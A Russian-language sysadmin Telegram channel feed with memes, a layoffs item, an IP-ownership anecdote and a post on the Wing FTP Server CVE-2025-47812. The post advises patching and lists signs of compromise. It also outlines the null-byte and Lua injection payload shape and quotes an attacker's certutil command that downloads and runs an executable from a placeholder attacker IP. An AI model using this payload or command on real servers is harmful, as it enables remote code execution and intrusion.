🧠 UX на минималках, доход — на максималках.

Хитрые разрабы.

Типичный 😶 Сисадмин

Некоторые костыли становятся несущей конструкцией 🎩

Типичный 🌚 Сисадмин

С каждым могло быть 🛌

Типичный 🥸 Сисадмин

Переход от софтверщика к хардверщику произошёл успешно. Зато не троттлит.

Типичный 🥸 Сисадмин

🔥 Wing FTP Server под атакой. Разбор уязвимости и комедия ошибок от хакеров.

Новость для всех, кто использует Wing FTP Server. В нем обнаружена критическая уязвимость CVE-2025-47812, которая позволяет удаленно выполнить код с правами SYSTEM/root.

Уязвимость уже активно эксплуатируется, так что если у вас развернут этот сервер, необходимо обновиться до версии 7.4.4.

Технически, уязвимость представляет собой комбинацию из инъекции нулевого байта (%00) и инъекции кода на языке Lua в параметре имени пользователя при аутентификации (через loginok.html). Атакующий может отправить специально сформированный запрос, используя учетную запись, для которой известен пароль (или анонимную, если она включена). Полезная нагрузка в поле username выглядит примерно так: `` имя_пользователя%00]]...вредоносный_Lua_код...-- ``. Нулевой байт обрывает обработку строки с именем, ]] корректно закрывает синтаксис объекта сессии, а -- комментирует остаток оригинального кода. В результате вредоносный Lua-код записывается в файл сессии на сервере (файл с расширением .lua в директории session). При следующем обращении к серверу (например, при запросе страницы dir.html) он считывает этот файл, десериализует данные и выполняет внедренный код.

Признаки взлома можно найти в логах сервера (Log\Domains\) — ищите обрезанные записи вида `` User 'anonymous `` (без закрывающей кавычки). Более надежный способ — проверить файлы сессий в директории session на аномально большой размер или наличие подозрительного Lua-кода (например, функций для hex-декодирования или вызова io.popen). Один из реальных пейлоадов, который обнаружили исследователи, выглядел так: `` certutil -urlcache -f http://[IP_АТАКУЮЩЕГО]/[payload.exe] %TEMP%\mvveiWJHx.exe & start /B %TEMP%\mvveiWJHx.exe ``.

А теперь самое интересное как это выглядело на практике. Аналитики из Huntress разобрали реальную атаку и выяснили, что уязвимостью воспользовались, мягко говоря, не самые опытные хакеры. Их действия были похожи на комедию ошибок: они запускали базовые команды для разведки (ipconfig, whoami), пытались создавать пользователей с паролями вроде 123123qweqwe, делали опечатки в путях к файлам (например, c:^A.exe, где ^A — это управляющий символ SOH), пытались запустить встроенную команду dir как внешний бинарник и не смогли правильно составить curl-команду для скачивания своего же бэкдора. В конце концов, они попытались скачать и запустить пейлоад с помощью certutil, но его тут же удалил Microsoft Defender (Trojan:Win32/Ceprolad.A). После этого процесс WFTPServer.exe упал, и сессия атакующих оборвалась 😂😂

Эх, а ведь были прекрасные нулевые, когда для взлома сервера нужно было быть настоящим гением. А теперь достаточно просто найти готовый эксплойт на GitHub и уметь правильно скопировать команду... хотя, как видно, даже с последним у некоторых проблемы 😬

Типичный 🥸 Сисадмин

Это тот самый момент, когда дедлайны горят, техника идет на списание, а кто-то до тебя закрутил винты на VGA-кабеле с силой, достойной затяжки колесных гаек. В такие моменты отвертка становится слишком медленным инструментом.

Один щелчок кусачками и ты уже у следующего системника 😶

Типичный 🥸 Сисадмин

А UDP где выдают?
#предложка

Типичный 😎 Сисадмин

🔥 Microsoft заменит уволенных разработчиков Candy Crush ИИ-инструментами, которые те помогли создать

После увольнения 200 сотрудников King (разработчик Candy Crush) в Барселоне выяснилось: их заменили ИИ-инструменты, которые они сами создавали. Жестокий парадокс:

→ Уволены дизайнеры уровней, UX-специалисты, копирайтеры;
→ Их ИИ-наработки теперь делают ту же работу «ради эффективности».

Этичный ИИ? Пока лишь лозунг.

Типичный 🥸 Сисадмин

Поучительная история, которая заставляет задуматься. Наш коллега работает в небольшой компании в сельской местности, где основной интернет это оптика, а все остальное работает через LTE. Столкнувшись с проблемами связи, он решил в качестве эксперимента написать на C/C++ приложение, которое склеивает 3-4 LTE-канала в один, агрегируя их пропускную способность.

Проект, который он делал в основном в свободное время, оказался на удивление удачным, приложение работает без сбоев, легко настраивается и даже имеет приятный дашборд с мониторингом трафика. Он внедрил его в своей компании, и все были довольны. До недавнего времени...

Руководство, увидев успешное решение, теперь просит его подготовить релизную версию приложения, так как они хотят его продавать 💸, считая продукт собственностью компании. Ситуация усугубляется тем, что в его трудовом договоре нет ни слова о правах на интеллектуальную собственность, а разработка велась не только в рабочее время и не по их инициативе.

Тут же вспоминается цитата Рэда из сериала Черный список

Никогда не переживай о том, чтобы предать свое рабочее место, потому что, если представится шанс, твое рабочее место предаст тебя 🤔

З.Ы. Если хотите создать свой продукт, делайте это на 100% в свое время, на своем оборудовании и без использования корпоративных ресурсов. Ведите подробную документацию.

Вместо того чтобы воевать, эту ситуацию можно использовать как рычаг для переговоров. Когда ты единственный, кто знает, как работает код, то это отличный повод потребовать повышения ЗП, новую должность или процент с продаж. Можно также тактично указать руководству, что внутренний инструмент и коммерческий продукт это две большие разницы. Коммерческая версия потребует серьезных вложений в документацию, техническую поддержку, тестирование и обеспечение безопасности, и еще не факт, что компания готова к таким инвестициям 🙄

Типичный 🥸 Сисадмин